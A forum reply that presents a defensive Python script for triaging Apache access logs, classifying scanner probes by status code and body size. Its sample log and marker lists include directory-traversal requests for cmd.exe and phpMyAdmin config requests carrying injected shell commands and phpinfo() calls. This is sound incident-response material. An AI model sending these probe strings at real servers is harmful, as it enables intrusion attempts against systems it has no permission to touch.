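The questions in both posts above (svengali's "were any of the 400-type hits successful, and what about the 200 on the cmd.exe line?" and asegur's "is a 301 a result for the attacker?") are the same triage problem: for each scanner request, what did Apache actually do with it? The script below is an added example written for this thread, not code from the thread or from the XAMPP project. It parses Apache "combined" access-log lines, picks out scanner traffic, and classifies each hit by status code and response size. Two facts do the work. First, Apache maps only the part of the request before the first `?` to the filesystem, so `/msadc/..?..?..?../winnt/system32/cmd.exe` is a request for `/msadc/..`, which collapses to `/`; a 200 whose byte count matches the site's own index page (1210 and 1211 bytes elsewhere in the log above) is the homepage being served, not cmd.exe. Second, a 301 carries its target in a Location header, which the access log does not record, so the only way to know where Apache sent the request is to read the server's own Redirect/RewriteRule/DirectorySlash configuration; the 316-byte body is the redirect notice, not the requested file. The marker lists, the "within 1% of the index size" tolerance, and the sample log lines (modeled on the ones quoted in the thread, with addresses replaced by documentation ranges) are all assumptions constructed for the example.

```python
import posixpath
import re
from collections import Counter, defaultdict
from urllib.parse import unquote, urlsplit

# Apache "combined" LogFormat, the format of the lines quoted in this thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed marker lists: request fragments and User-Agent strings that never occur in
# normal use of a picture-sharing site. Seeded from the probes quoted in the thread.
PROBE_MARKERS = ("cmd.exe", "/winnt/", "config.inc.php", "setup.php", "/manager/html",
                 "w00tw00t", "msgimport", "install.txt", "autoexec.bat", "phpinfo(", ".htaccess")
SCANNER_UAS = ("scanner", "zmeu", "toata dragostea", "indy library", "libwww-perl")
KNOWN_METHODS = ("GET", "HEAD", "POST")
SIZE_TOLERANCE = 0.01  # assumption: a 200 body within 1% of the index page's size is the index page


def parse_line(line):
    """Parse one combined-format line into a dict; return None for non-log lines (e.g. the '.' fillers)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    parts = rec["req"].split(" ")
    # Malformed request lines ('GET HTTP/1.1 HTTP/1.1', '\xbad') do not split into
    # method/target/version; keep them rather than dropping the evidence.
    rec["method"] = parts[0] if len(parts) >= 2 else ""
    target = parts[1] if len(parts) >= 2 else rec["req"]
    # Apache maps only the part before the first '?' to the filesystem; the rest is the
    # query string, so '/msadc/..?..?../winnt/system32/cmd.exe' asks for '/msadc/..'.
    url = urlsplit(target)
    rec["absolute_uri"] = bool(url.netloc)   # 'GET http://host/' is an open-proxy check
    rec["path"] = unquote(url.path)
    rec["query"] = unquote(url.query)
    # Collapse '//' and '..' the way the server does before looking the path up.
    rec["normpath"] = posixpath.normpath(re.sub(r"/+", "/", rec["path"] or "/"))
    return rec


def is_probe(rec):
    hay = (rec["path"] + "?" + rec["query"]).lower()
    return (rec["absolute_uri"]
            or rec["method"] not in KNOWN_METHODS
            or any(mk in hay for mk in PROBE_MARKERS)
            or any(ua in rec["ua"].lower() for ua in SCANNER_UAS))


def index_sizes(records):
    """Byte counts of legitimate 200 responses for '/': the baseline a suspicious 200 is compared to."""
    return {r["size"] for r in records
            if r["status"] == 200 and r["normpath"] == "/" and not is_probe(r)}


def verdict(rec, baseline):
    """What the server actually did with a probe, judged from status code and body size."""
    s = rec["status"]
    if s >= 400:
        return "rejected"          # 4xx/5xx: nothing was served
    if 300 <= s < 400:
        return "redirected"        # Location is not logged: read Redirect/RewriteRule/DirectorySlash config
    if s == 200:
        if rec["normpath"] == "/" and any(abs(rec["size"] - b) <= b * SIZE_TOLERANCE for b in baseline):
            return "index-served"  # path collapsed to '/', the homepage came back
        return "INVESTIGATE"       # a 200 whose body is not the index page: check htdocs on disk
    return "other"


def triage(lines):
    """Return (findings, per_ip): one (ip, request, verdict) per probe, and a per-IP verdict count."""
    recs = [r for r in map(parse_line, lines) if r]
    baseline = index_sizes(recs)
    findings = [(r["ip"], r["req"], verdict(r, baseline)) for r in recs if is_probe(r)]
    per_ip = defaultdict(Counter)
    for ip, _, v in findings:
        per_ip[ip][v] += 1
    return findings, dict(per_ip)


# Constructed sample modeled on the thread's lines, with addresses from documentation ranges.
SAMPLE_LOG = r"""
192.0.2.10 - - [27/Sep/2009:02:15:37 -0500] "GET / HTTP/1.0" 200 1210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
192.0.2.10 - - [27/Sep/2009:02:15:39 -0500] "GET /pics/cat.jpg HTTP/1.0" 200 48213 "http://pictures.example/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
203.0.113.7 - - [06/Nov/2009:03:06:30 -0600] "GET /_mem_bin/..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.0" 404 1161 "-" "-"
203.0.113.7 - - [06/Nov/2009:03:17:37 -0600] "GET /msadc/..?..?..?../winnt/system32/cmd.exe HTTP/1.0" 200 1207 "-" "-"
198.51.100.9 - - [07/Sep/2009:19:05:22 -0500] "GET /phpmyadmin/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 403 1323 "-" "crimscanner/1.0"
198.51.100.9 - - [10/Jan/2010:08:32:12 +0100] "GET //p/m/a/config/config.inc.php?p=phpinfo(); HTTP/1.1" 301 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
198.51.100.44 - - [13/Sep/2009:04:44:06 -0500] "GET http://www.example.net/ HTTP/1.1" 200 1211 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
203.0.113.80 - - [22/Nov/2009:23:21:23 -0600] "\xbad" 501 1097 "-" "-"
"""

if __name__ == "__main__":
    findings, per_ip = triage(SAMPLE_LOG.strip().splitlines())
    for ip, req, v in findings:
        print(f"{v:13} {ip:15} {req}")
    print(per_ip)
```

Run it against a real access log with `triage(open("access.log").readlines())`. Anything that comes back `INVESTIGATE` (a 200 for a scanner path whose body size does not match the index page) is the case where the log alone cannot answer the question and the `htdocs` directory, the `DirectoryIndex` and `ErrorDocument` settings, and file modification times on disk have to be checked; `rejected` and `index-served` hits are the server refusing or ignoring the probe, which is what most of the lines in this thread are.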

